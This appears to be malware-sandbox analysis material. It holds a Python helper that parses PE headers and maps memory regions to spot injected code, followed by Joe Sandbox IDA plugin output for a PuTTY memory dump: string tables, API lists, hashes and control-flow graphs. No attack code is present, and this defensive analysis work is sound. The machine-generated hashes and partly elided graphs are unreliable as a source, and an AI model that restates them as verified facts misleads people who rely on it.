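    struct.pack_into("<II", opt, 56, 0x140000, 0x400)        # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 70, DYNAMIC_BASE | HIGH_ENTROPY_VA | NX_COMPAT)
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, rva, vs, 0, 0, 0, 0, 0, ch)
                     for n, rva, vs, ch in sections)
    return (dos + b"PE\0\0" + coff + bytes(opt) + table).ljust(0x400, b"\0")


if __name__ == "__main__":
    image = parse_pe_image(build_sample_image())
    base = 0x7FF6785D0000
    for start in (0x7FF6785D0000, 0x7FF6785D1000, 0x7FF6786BA000, 0x7FF6786FB000):
        print(f"{start:#x} -> {locate_region(image, base, start)}")
    print(hardening_flags(image))
```

On a real dump, feed the bytes of the region that starts at the module base (the first Associated file above, protection 0x02) to parse_pe_image and pass the Offset value as module_base; a region whose section is marked executable but whose address is not covered by any section of the on-disk file is the usual sign of injected or unpacked code.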
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: NameUser
                      • String ID: (Log file name can contain &Y, &M, &D for date, &T for time, &H for host name, and &P for port number)$(Use 1M for 1 megabyte, 1G for 1 gigabyte etc)$**MORE** processing$... in this many seconds$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/config.c$1 (INSECURE)$6$Action to happen when a bell occurs:$Active$Add$Add key$Add new forwarded port:$Adjust how %s handles line drawing characters$Adjust the behaviour of the window title$Adjust the precise colours %s displays$Adjust the use of the cursor$Adjust the use of the mouse pointer$Adjust the window border$Algorithm selection policy:$All session output$Allow GSSAPI credential delegation$Allow agent forwarding$Allow attempted changes of username in SSH-2$Allow terminal to specify ANSI colours$Allow terminal to use 24-bit colours$Allow terminal to use xterm 256-colour mode$Always$Always append to the end of it$Always overwrite it$Answerback to ^E:$Application$Application keypad settings:$Apply$Ask the user every time$Assign copy/paste actions to clipboards$Attempt "keyboard-interactive" auth (SSH-2)$Attempt GSSAPI authentication (SSH-2 only)$Attempt GSSAPI key exchange$Attempt GSSAPI key exchange (SSH-2 only)$Attempt TIS or CryptoCard auth (SSH-1)$Attempt authentication using Pageant$Authentication methods$Auto$Auto wrap mode initially on$Auto-copy selected text to system clipboard$Auto-login username$BSD (commonplace)$Basic options for your %s session$Bell is temporarily disabled when over-used$Block$Blue$Both$Bypass authentication entirely (SSH-2 only)$Cancel$Certificate to use with the private key (optional):$Change the sequences sent by:$Character classes:$Character set translation$Chokes on PuTTY's SSH-2 'winadj' requests$Chokes on PuTTY's full KEXINIT$Chokes on SSH-1 RSA authentication$Chokes on SSH-1 ignore messages$Chokes on SSH-2 ignore messages$Classes of character that group together$Close window on exit:$Columns$Command to send to proxy (for some types)$Configure host 
CAs$Configure the appearance of %s's window$Configure the behaviour of %s's window$Configure the serial line$Configure trusted certification authorities$Connection$Connection type:$Connection/Data$Connection/Proxy$Connection/Rlogin$Connection/SSH$Connection/SSH/Auth$Connection/SSH/Auth/Credentials$Connection/SSH/Auth/GSSAPI$Connection/SSH/Bugs$Connection/SSH/Cipher$Connection/SSH/Host keys$Connection/SSH/Kex$Connection/SSH/More bugs$Connection/SSH/TTY$Connection/SSH/Tunnels$Connection/SSH/X11$Connection/SUPDUP$Connection/Serial$Connection/Telnet$Consider proxying local host connections$Control pasting of text from clipboard to terminal$Control the bell overload behaviour$Control the scrollback in the window$Control use of mouse$Control-? (127)$Control-H$Copy and paste line drawing characters as lqqqk$Credentials to authenticate with$Ctrl + Shift + {C,V}:$Ctrl toggles app mode$Cursor appearance:$Cursor blinks$DEC Origin Mode initially on$Data bits$Data to send to the server$Default selection mode (Alt+drag does the other one):$Delete$Destination$Detection of known bugs in SSH servers$Disable Arabic text shaping$Disable Nagle's algorithm (TCP_NODELAY option)$Disable application cursor keys mode$Disable application keypad mode$Disable bidirectional text display$Disable destructive backspace on server sending ^?$Disable remote-controlled character set configuration$Disable remote-controlled clearing of scrollback$Disable remote-controlled terminal resizing$Disable remote-controlled window title changing$Disable switching to alternate terminal screen$Disable xterm-style mouse reporting$Discards data sent before its greeting$Disconnect if authentication succeeds trivially$Display pre-authentication banner (SSH-2 only)$Display scrollbar$Do DNS name lookup at proxy end:$Don't allocate a pseudo-terminal$Don't start a shell or command at all$Downstream (connecting to the upstream PuTTY)$Dynamic$Dynamic Library Files (*.dll)$ESC[n~$Empty string$Enable TCP keepalives 
(SO_KEEPALIVE option)$Enable VT100 line drawing even in UTF-8 mode$Enable X11 forwarding$Enable blinking text$Enable compression$Enable legacy use of single-DES in SSH-2$Enabling and disabling advanced terminal features$Encryption cipher selection policy:$Encryption options$Environment variables$Exclude Hosts/IPs$Extended ASCII Character set:$Flow control$Flush log file frequently$Font settings$Font used in the terminal window$For selected mode, send:$Force off$Force on$Forwarded ports:$Further workarounds for SSH server bugs$Gap between text and window edge:$General options for colour usage$Green$Handles SSH-2 key re-exchange badly$Handling of OLD_ENVIRON ambiguity:$Handling of line drawing characters:$Hide mouse pointer when typing in window$Host Name (or IP address)$Host key algorithm preference$Host keys or fingerprints to accept:$IPv4$IPv6$Ignores SSH-2 maximum packet size$Implicit CR in every LF$Implicit LF in every CR$Include header$Indicate bolded text by changing:$Initial state of cursor keys:$Initial state of numeric keypad:$Internet protocol version$Key$Key exchange algorithm options$Keyboard sends Telnet special commands$Line discipline options$Lines of scrollback$Linux$Load$Load, save or delete a stored session$Local$Local echo:$Local line editing:$Local ports accept connections from other hosts$Local username:$Location string$Log file name:$Logical name of remote host$Logical name of remote host (e.g. 
for SSH key lookup):$Logical name of remote host:$Login details$Low-level TCP connection options$MIT-Magic-Cookie-1$Make default system alert sound$Manually configure host keys for this connection$Manually enabled workarounds$Max data before rekey (0 for no limit)$Max minutes before rekey (0 for no limit)$Minutes between GSS checks (0 for never)$Miscomputes SSH-2 HMAC keys$Miscomputes SSH-2 encryption keys$Misuses the session ID in SSH-2 PK auth$Modify$Mouse paste action:$NetHack$Never$None$None (bell disabled)$Normal$Nothing$Nothing on this panel may be reconfigured in mid-session; it is only here so that sub-panels of it can exist without looking strange.$Old RSA/SHA2 cert algorithm naming$Omit known password fields$Omit session data$Only on clean exit$Only supports pre-RFC4419 SSH-2 DH GEX$Only until session starts$Open$Options controlling %s's window$Options controlling GSSAPI authentication$Options controlling Rlogin connections$Options controlling SSH X11 forwarding$Options controlling SSH authentication$Options controlling SSH connections$Options controlling SSH encryption$Options controlling SSH host keys$Options controlling SSH key exchange$Options controlling SSH port forwarding$Options controlling SUPDUP connections$Options controlling Telnet connections$Options controlling character set translation$Options controlling copy and paste$Options controlling copying from terminal to clipboard$Options controlling key re-exchange$Options controlling local serial lines$Options controlling proxy usage$Options controlling session logging$Options controlling the connection$Options controlling the effects of keys$Options controlling the terminal bell$Options controlling the terminal emulation$Options controlling use of colours$Options specific to SSH packet logging$Other authentication-related options$Other:$Over-use means this many bells...$Parity$Passive$Password$Permit control characters in pasted text$Permitted roles in a shared connection:$Plugin command to 
run$Plugin to provide authentication responses$Poor man's line drawing (+, - and |)$Port$Port forwarding$Prefer algorithms for which a host key is known$Preference order for GSSAPI libraries:$Print proxy diagnostics in the terminal window$Printable output$Printer to send ANSI printer output to:$Private key file for authentication:$Prompt$Protocol options$Proxy hostname$Proxy type:$PuTTY Private Key Files (*.ppk)$Public-key authentication$Push erased text into scrollback$RFC 1408 (unusual)$RGB value:$Rectangular block$Red$Refuses all SSH-1 password camouflage$Remote$Remote X11 authentication protocol$Remote character set:$Remote command:$Remote ports do the same (SSH-2 only)$Remote terminal settings$Remote-controlled printing$Remove$Replies to requests on closed channels$Requires padding on SSH-2 RSA signatures$Reset scrollback on display activity$Reset scrollback on keypress$Response to remote title query (SECURITY):$Return key sends Telnet New Line instead of ^M$Rows$SCO$SSH packets$SSH packets and raw data$SSH protocol version:$Save$Save the current session settings$Saved Sessions$Seconds between keepalives (0 to turn off)$Seconds of silence required$Select a colour from the list, and then click the Modify button to change its appearance.$Select a colour to adjust:$Select a serial line$Select certificate file$Select library file$Select private key file$Select session log file name$Sending of null packets to keep session active$Separate window and icon titles$Serial line to connect to$Session$Session logging:$Session/Logging$Set$Set the size of the window$Set the style of bell$Set to class$Set various terminal options$Share SSH connections if possible$Sharing an SSH connection between PuTTY tools$Shift overrides application's use of mouse$Shift/Ctrl/Alt with the arrow keys$Source port$Specify the destination you want to connect to$Speed (baud)$Standard$Stop bits$Telnet negotiation mode:$Telnet protocol adjustments$Terminal$Terminal details$Terminal modes$Terminal 
modes to send:$Terminal scrolling$Terminal speeds$Terminal-type string$Terminal/Bell$Terminal/Features$Terminal/Keyboard$The Backspace key$The Function keys and keypad$The Home and End keys$The bell is re-enabled after a few seconds of silence.$The colour$The font$This:$Treat CJK ambiguous characters as wide$Underline$Upstream (connecting to the real server)$Use Unicode line drawing code points$Use background colour to erase screen$Use system username (%s)$User-supplied GSSAPI library path:$Username$VT100+$VT400$Value$Variable$Vertical line$Visual bell (flash window)$WAITS$Warn before closing window$What to do if the log file already exists:$When username is not specified:$Window$Window title$Window title:$Window/Appearance$Window/Behaviour$Window/Colours$Window/Selection$Window/Selection/Copy$Window/Translation$Workarounds for SSH server bugs$X display location$XDM-Authorization-1$Xterm 216+$Xterm R6$Yes$adjust$aux$b$backends[c->radio.nbuttons]$backends[i]$basics$c->radio.nbuttons == 0$charclass$config-address-family$config-ansicolour$config-answerback$config-appcursor$config-appkeypad$config-autowrap$config-backspace$config-bellovl$config-bellstyle$config-blink$config-boldcolour$config-charclasses$config-charset$config-cjk-ambig-wide$config-closeonexit$config-colourcfg$config-command$config-crlf$config-cursor$config-decom$config-environ$config-erase$config-erasetoscrollback$config-features-altscreen$config-features-application$config-features-bidi$config-features-charset$config-features-clearscroll$config-features-dbackspace$config-features-mouse$config-features-qtitle$config-features-resize$config-features-retitle$config-features-shaping$config-font$config-funkeys$config-homeend$config-hostname$config-keepalive$config-lfcr$config-linedraw$config-linedrawpaste$config-localecho$config-localedit$config-logfileexists$config-logfilename$config-logflush$config-logging$config-logheader$config-loghost$config-logssh$config-mouseptr$config-mouseshift$config-nodelay$config-
oldenviron$config-paste-ctrl-char$config-printing$config-proxy$config-proxy-auth$config-proxy-command$config-proxy-dns$config-proxy-exclude$config-proxy-logging$config-proxy-type$config-ptelnet$config-rectselect$config-rlogin-localuser$config-saving$config-scrollback$config-selection-autocopy$config-selection-clipactions$config-serial-databits$config-serial-flow$config-serial-line$config-serial-parity$config-serial-speed$config-serial-stopbits$config-sharrow$config-ssh-agentfwd$config-ssh-auth-gssapi$config-ssh-auth-gssapi-delegation$config-ssh-auth-gssapi-libraries$config-ssh-authplugin$config-ssh-banner$config-ssh-bug-chanreq$config-ssh-bug-derivekey2$config-ssh-bug-dropstart$config-ssh-bug-filter-kexinit$config-ssh-bug-hmac2$config-ssh-bug-ignore1$config-ssh-bug-ignore2$config-ssh-bug-maxpkt2$config-ssh-bug-oldgex2$config-ssh-bug-pksessid2$config-ssh-bug-plainpw1$config-ssh-bug-rekey$config-ssh-bug-rsa-sha2-cert-userauth$config-ssh-bug-rsa1$config-ssh-bug-sig$config-ssh-bug-winadj$config-ssh-cert$config-ssh-changeuser$config-ssh-comp$config-ssh-encryption$config-ssh-hostkey-order$config-ssh-kex-cert$config-ssh-kex-manual-hostkeys$config-ssh-kex-order$config-ssh-kex-rekey$config-ssh-ki$config-ssh-noauth$config-ssh-noshell$config-ssh-notrivialauth$config-ssh-portfwd$config-ssh-portfwd-address-family$config-ssh-portfwd-localhost$config-ssh-prefer-known-hostkeys$config-ssh-privkey$config-ssh-prot$config-ssh-pty$config-ssh-sharing$config-ssh-tis$config-ssh-tryagent$config-ssh-x11$config-ssh-x11auth$config-tcp-keepalives$config-telnetkey$config-telnetnl$config-termspeed$config-termtype$config-title$config-truecolour$config-ttymodes$config-username$config-username-from-env$config-utf8linedraw$config-warnonclose$config-winborder$config-winsize$config-xtermcolour$data$disclaimer$f$general$hostport$identity$ipversion$ldisc$main$manual$mappings$n_ui_backends > 0 && n_ui_backends < 
PROTOCOL_LIMIT$otheropts$overload$plugin$protocol$publickey$r$repeat$rxvt$s$savedsessions$sercfg$serline$sshtty$supdup-ascii$supdup-location$supdup-more$supdup-scroll$tcp$term$trans$tweaks$xterm-style bitmap${Ctrl,Shift} + Ins:
                      • API String ID: 2645101109-754834895
                      • Opcode ID: 7d3f9ddb586df674f39f5c5db71c8caec48e86601bfd0c2f072999babbcf95e4
                      • Instruction ID: 030769ad11cc9de58d6f547cf191ece04dca4c300d8ed834c9e862399f411b36
                      • Opcode Fuzzy Hash: 7d3f9ddb586df674f39f5c5db71c8caec48e86601bfd0c2f072999babbcf95e4
                      • Instruction Fuzzy Hash: 99939432A28B42A5EB10DB21F8412BB7B95FB44784F700135EA8D8779ADF3CD905E758

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph: basic blocks 7ff67860aef4 to 7ff67860c37e with their call targets (edge list of the rendered graph elided; it is not recoverable as text)
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: %d,%d,%d$ANSIColour$BCE$BlinkText$BoldAsColour$BugChanReq$BugDeriveKey2$BugDropStart$BugFilterKexinit$BugHMAC2$BugIgnore1$BugIgnore2$BugMaxPkt2$BugOldGex2$BugPKSessID2$BugPlainPW1$BugRSA1$BugRSAPad2$BugRSASHA2CertUserauth$BugRekey2$BugWinadj$BuggyMAC$CJKAmbigWide$CapsLockCyr$Colour%d$ConnectionSharing$ConnectionSharingDownstream$ConnectionSharingUpstream$CtrlShiftCV$CtrlShiftIns$EraseToScrollback$FontQuality$FontVTMode$LineCodePage$LocalPortAcceptAll$LockSize$LoginShell$MouseAutocopy$MouseIsXterm$MouseOverride$MousePaste$PasteControls$PasteRTF$PortForwardings$Printer$RawCNP$RectSelect$RemotePortAcceptAll$SSHManualHostKeys$SUPDUPCharset$SUPDUPLocation$SUPDUPMoreProcessing$SUPDUPScrolling$ScrollBar$ScrollBarFullScreen$ScrollOnDisp$ScrollOnKey$ScrollbarOnLeft$SerialDataBits$SerialFlowControl$SerialLine$SerialParity$SerialSpeed$SerialStopHalfbits$ShadowBold$ShadowBoldOffset$StampUtmp$TermHeight$TermWidth$The Internet$TrueColour$TryPalette$UTF8Override$UTF8linedraw$UseSystemColours$WideBoldFont$WideFont$WinTitle$WindowClass$Wordness%d$X11AuthFile$X11AuthType$X11Display$X11Forward$Xterm256Colour
                      • API String ID: 0-1829101210
                      • Opcode ID: 22f5ba9b024153285404823b1049d72f0d81ff970af42732919e8d31ed2423a0
                      • Instruction ID: 5deb95293963c097d475e33a6df80c95eadcf24cba776c1187207a087bd685f6
                      • Opcode Fuzzy Hash: 22f5ba9b024153285404823b1049d72f0d81ff970af42732919e8d31ed2423a0
                      • Instruction Fuzzy Hash: 34B23952F3851661FA14A7329A61ABB1A465F81BD0F709031DC0D8BB97EE2DED02B35C

                      Control-flow Graph

                      control_flow_graph 2302 7ff6785d53e3-7ff6785d53f0 2303 7ff6785d53f2-7ff6785d5493 call 7ff67868c310 call 7ff678611360 * 4 2302->2303 2313 7ff6785d5495-7ff6785d549f 2303->2313 2314 7ff6785d54da-7ff6785d54e8 GetDesktopWindow GetClientRect 2303->2314 2313->2314 2316 7ff6785d54a1-7ff6785d54d8 GetMonitorInfoA 2313->2316 2315 7ff6785d54ee-7ff6785d551a call 7ff678606f20 2314->2315 2320 7ff6785d5520-7ff6785d5527 2315->2320 2321 7ff6785d551c-7ff6785d551e 2315->2321 2316->2315 2322 7ff6785d552b-7ff6785d5637 call 7ff678612900 * 3 call 7ff6786112a0 call 7ff678611360 call 7ff6786112a0 * 2 call 7ff6785d1080 CreateWindowExW 2320->2322 2321->2322 2339 7ff6785d5655-7ff6785d566f 2322->2339 2340 7ff6785d5639-7ff6785d5650 GetLastError call 7ff678617ad0 call 7ff6785d6000 2322->2340 2342 7ff6785d56d0-7ff6785d5711 GetDC GetDeviceCaps * 2 ReleaseDC 2339->2342 2343 7ff6785d5671-7ff6785d567b 2339->2343 2340->2339 2344 7ff6785d5717-7ff6785d5757 call 7ff678613590 call 7ff6785d6080 call 7ff6786134f0 2342->2344 2343->2342 2346 7ff6785d567d-7ff6785d56a1 MonitorFromWindow 2343->2346 2359 7ff6785d5760-7ff6785d5775 2344->2359 2351 7ff6785d56a3-7ff6785d56ba 2346->2351 2352 7ff6785d56bc-7ff6785d56c2 2346->2352 2354 7ff6785d56c8-7ff6785d56ca 2351->2354 2352->2354 2354->2342 2356 7ff6785d56cc-7ff6785d56ce 2354->2356 2356->2342 2356->2344 2359->2359 2360 7ff6785d5777-7ff6785d57b7 call 7ff6785e0820 2359->2360 2363 7ff6785d57d2-7ff6785d57eb call 7ff6786112a0 2360->2363 2364 7ff6785d57b9-7ff6785d57cd call 7ff67869b8ac 2360->2364 2368 7ff6785d57ed-7ff6785d57fd 2363->2368 2369 7ff6785d5808-7ff6785d5afc call 7ff678611360 call 7ff6785fc600 call 7ff6785e9b50 call 7ff678611360 * 3 call 7ff6785e1330 GetWindowRect GetClientRect call 7ff678611360 SetWindowPos call 7ff6786134f0 call 7ff67868c310 CreateBitmap call 7ff678613590 CreateCaret SetScrollInfo GetDoubleClickTime GetSystemMenu CreatePopupMenu AppendMenuA * 2 CreateMenu call 7ff67860c930 2363->2369 2364->2363 2368->2369 2394 
7ff6785d5b00-7ff6785d5b13 DeleteMenu 2369->2394 2394->2394 2395 7ff6785d5b15-7ff6785d5b1c 2394->2395 2396 7ff6785d5b1e-7ff6785d5b28 2395->2396 2397 7ff6785d5b71-7ff6785d5b8a AppendMenuA 2395->2397 2398 7ff6785d5b30-7ff6785d5b6a AppendMenuA 2396->2398 2399 7ff6785d5b90-7ff6785d5bb1 2397->2399 2398->2398 2400 7ff6785d5b6c-7ff6785d5b6f 2398->2400 2401 7ff6785d5bfe-7ff6785d5d23 call 7ff678611360 call 7ff6785dd2b0 2399->2401 2400->2397 2400->2399 2420 7ff6785d5bc0-7ff6785d5bf8 call 7ff678612890 call 7ff678613590 2401->2420 2421 7ff6785d5d29-7ff6785d5d3d 2401->2421 2420->2401 2428 7ff6785d5d42-7ff6785d5d49 call 7ff6786174f0 2420->2428 2421->2420 2431 7ff6785d5d62-7ff6785d5e2c call 7ff6785fc7a0 call 7ff6785d69c0 GetKeyboardLayout GetLocaleInfoA call 7ff67869cb74 ShowWindow SetForegroundWindow GetForegroundWindow call 7ff6785e9b60 UpdateWindow call 7ff6785dd010 2428->2431 2432 7ff6785d5d4b-7ff6785d5d59 2428->2432 2443 7ff6785d5e33-7ff6785d5e3f call 7ff6785fcae0 2431->2443 2432->2431 2446 7ff6785d5e81-7ff6785d5ea9 call 7ff6785fcf90 MsgWaitForMultipleObjects 2443->2446 2447 7ff6785d5e41-7ff6785d5e5e PeekMessageA 2443->2447 2453 7ff6785d5eb5-7ff6785d5ebd call 7ff6785fd0d0 2446->2453 2454 7ff6785d5eab-7ff6785d5eb0 call 7ff6785fd060 2446->2454 2447->2446 2448 7ff6785d5e60-7ff6785d5e7c GetForegroundWindow call 7ff6785e9b60 2447->2448 2448->2446 2458 7ff6785d5ed7-7ff6785d5eee PeekMessageW 2453->2458 2454->2453 2459 7ff6785d5ef4-7ff6785d5efc 2458->2459 2460 7ff6785d5e2e call 7ff6785fca80 2458->2460 2462 7ff6785d5efe-7ff6785d5f0e call 7ff6785f27f0 IsWindow 2459->2462 2463 7ff6785d5f1f-7ff6785d5f2b call 7ff6785d6bd0 2459->2463 2460->2443 2468 7ff6785d5ec0-7ff6785d5ec3 DispatchMessageW 2462->2468 2469 7ff6785d5f10-7ff6785d5f1b IsDialogMessageA 2462->2469 2470 7ff6785d5ec6-7ff6785d5ed1 2468->2470 2469->2470 2471 7ff6785d5f1d 2469->2471 2470->2458 2470->2460 2471->2468
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Menu$CreateWindow$Append$Rect$CapsClientDeviceInfoMonitor$BitmapCaretClickDeleteDesktopDoubleErrorFromLastPopupReleaseScrollSystemTime
                      • String ID: &About %s$&Copy$&Duplicate Session$&Event Log$&Full Screen$&Help$&Paste$($(No sessions)$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$C&lear Scrollback$C&opy All to Clipboard$Chan&ge Settings...$Ne&w Session...$Rese&t Terminal$Running with restricted process ACL$Sa&ved Sessions$Unable to create terminal window: %s$term->mouse_select_clipboards[0] == CLIP_LOCAL
                      • API String ID: 1687698585-3101482697
                      • Opcode ID: 48aaeea15ef7db0832bf7a1c76454805f5af20c663b68f04bbe3b26f6b097f6f
                      • Instruction ID: cb9e85f94155d396f6ac129f6e66960ad6ee2337a6b8a3fa5d6fcb68043f5c7d
                      • Opcode Fuzzy Hash: 48aaeea15ef7db0832bf7a1c76454805f5af20c663b68f04bbe3b26f6b097f6f
                      • Instruction Fuzzy Hash: 6E528E32A2865296F750DB35E8547BB2B91BF94B90F344035C94EC3BA5DE3CED05AB08

                      Control-flow Graph

                      control_flow_graph 2472 7ff6785f2c60-7ff6785f2c99 2473 7ff6785f2c9f-7ff6785f2ca8 2472->2473 2474 7ff6785f30e9-7ff6785f30f2 2472->2474 2477 7ff6785f2cae-7ff6785f2cb5 2473->2477 2478 7ff6785f322f-7ff6785f3236 2473->2478 2475 7ff6785f344e-7ff6785f345e call 7ff67868a9f0 2474->2475 2476 7ff6785f30f8-7ff6785f3100 2474->2476 2492 7ff6785f3460-7ff6785f3473 2475->2492 2476->2475 2479 7ff6785f3106-7ff6785f310d 2476->2479 2480 7ff6785f329f-7ff6785f32c5 call 7ff6785f4ab0 call 7ff67868a9f0 2477->2480 2481 7ff6785f2cbb-7ff6785f2d11 call 7ff6785f4a30 call 7ff6785f5130 call 7ff6786250e0 2477->2481 2478->2475 2483 7ff6785f323c-7ff6785f3244 2478->2483 2479->2475 2485 7ff6785f3113-7ff6785f3194 SendMessageA * 3 call 7ff6785f65e0 2479->2485 2480->2492 2516 7ff6785f2d13-7ff6785f2d2c 2481->2516 2517 7ff6785f2d6c-7ff6785f2f33 LoadIconA SendMessageA call 7ff678626440 MapDialogRect CreateWindowExA SendMessageA * 2 MapDialogRect CreateWindowExA SendMessageA * 2 2481->2517 2483->2475 2488 7ff6785f324a-7ff6785f326a KillTimer call 7ff678616a00 2483->2488 2499 7ff6785f3474-7ff6785f34c3 call 7ff6785f5130 call 7ff6786250e0 2485->2499 2500 7ff6785f319a-7ff6785f31af 2485->2500 2502 7ff6785f3290-7ff6785f329a call 7ff678624e00 2488->2502 2503 7ff6785f326c-7ff6785f328b MessageBoxA call 7ff678613590 2488->2503 2525 7ff6785f34c5-7ff6785f34d7 2499->2525 2526 7ff6785f3518-7ff6785f3553 call 7ff6785fa880 SendMessageA InvalidateRect SetFocus 2499->2526 2504 7ff6785f3205-7ff6785f3209 2500->2504 2502->2475 2503->2502 2510 7ff6785f31c0-7ff6785f31ff call 7ff6785f63b0 call 7ff6785f6550 call 7ff678613590 * 2 call 7ff6785f65e0 2504->2510 2511 7ff6785f320b-7ff6785f320d 2504->2511 2510->2499 2510->2504 2514 7ff6785f3218-7ff6785f3225 GetDlgItem 2511->2514 2520 7ff6785f3210-7ff6785f3216 2514->2520 2521 7ff6785f3227-7ff6785f322d DestroyWindow 2514->2521 2523 7ff6785f2d30-7ff6785f2d53 call 7ff6785f65f0 2516->2523 2531 7ff6785f3301-7ff6785f3312 SendMessageA 2517->2531 2532 7ff6785f2f39-7ff6785f2f57 
2517->2532 2520->2510 2520->2514 2521->2520 2535 7ff6785f2d58-7ff6785f2d6a call 7ff6786250e0 2523->2535 2530 7ff6785f34e0-7ff6785f3516 call 7ff6785f65f0 call 7ff6786250e0 2525->2530 2526->2475 2530->2526 2539 7ff6785f3318-7ff6785f3331 call 7ff67869b8ac 2531->2539 2537 7ff6785f2fb2-7ff6785f2fc0 2532->2537 2535->2517 2535->2523 2545 7ff6785f2fc2-7ff6785f2fc5 2537->2545 2546 7ff6785f2f9a-7ff6785f2fac 2537->2546 2556 7ff6785f3333-7ff6785f3376 call 7ff6785f5130 call 7ff6786250e0 2539->2556 2551 7ff6785f2fe0 2545->2551 2552 7ff6785f2fc7-7ff6785f2fd4 call 7ff678624e90 2545->2552 2546->2537 2549 7ff6785f32ca-7ff6785f32fd SendMessageA 2546->2549 2549->2556 2557 7ff6785f32ff 2549->2557 2554 7ff6785f2fe2-7ff6785f2ff3 call 7ff678624e60 2551->2554 2552->2546 2567 7ff6785f2fd6-7ff6785f2fdb 2552->2567 2568 7ff6785f2ff5-7ff6785f3009 call 7ff67869b8ac 2554->2568 2569 7ff6785f300e-7ff6785f302b call 7ff67868c718 2554->2569 2574 7ff6785f33c8-7ff6785f33da call 7ff6785fa880 2556->2574 2575 7ff6785f3378-7ff6785f338a 2556->2575 2557->2539 2567->2554 2568->2569 2579 7ff6785f302d-7ff6785f3038 2569->2579 2580 7ff6785f303a 2569->2580 2585 7ff6785f33f3-7ff6785f3404 call 7ff6785f65e0 2574->2585 2586 7ff6785f33dc-7ff6785f33ed SetTimer 2574->2586 2577 7ff6785f3390-7ff6785f33af call 7ff6785f65f0 2575->2577 2584 7ff6785f33b4-7ff6785f33c6 call 7ff6786250e0 2577->2584 2583 7ff6785f3041-7ff6785f30a9 call 7ff6786a0680 SendMessageA 2579->2583 2580->2583 2593 7ff6785f30af-7ff6785f30de SendMessageA 2583->2593 2594 7ff6785f2f59 2583->2594 2584->2574 2584->2577 2596 7ff6785f3438-7ff6785f3447 ShowWindow 2585->2596 2597 7ff6785f3406-7ff6785f340b 2585->2597 2586->2585 2595 7ff6785f2f61-7ff6785f2f7d call 7ff67868c310 2593->2595 2598 7ff6785f30e4 2593->2598 2594->2595 2599 7ff6785f2f82-7ff6785f2f96 2595->2599 2596->2475 2601 7ff6785f3410-7ff6785f3416 2597->2601 2598->2599 2599->2546 2602 7ff6785f3430-7ff6785f3433 call 7ff6785fa750 2601->2602 2603 7ff6785f3418-7ff6785f342c call 7ff6785f65e0 2601->2603 2602->2596 
2603->2601 2607 7ff6785f342e 2603->2607 2607->2596
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Message$Send$Window$Rect$Dialog$CreateTimer$ClientDestroyFocusIconInvalidateItemKillLoadLongShowText
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/dialog.c$@$Cate&gory:$Demo screenshot failure$STATIC$SysTreeView32$firstpath$j == ctrl_path_elements(s->pathname) - 1
                      • API String ID: 443372750-407257924
                      • Opcode ID: 1e88966224fd870200e04f82941f27a47510af761bce352db075fa57f9858920
                      • Instruction ID: d3ea656f0381c48e5bc493b986e6cffa1af338143739cb9011ea18195ea31744
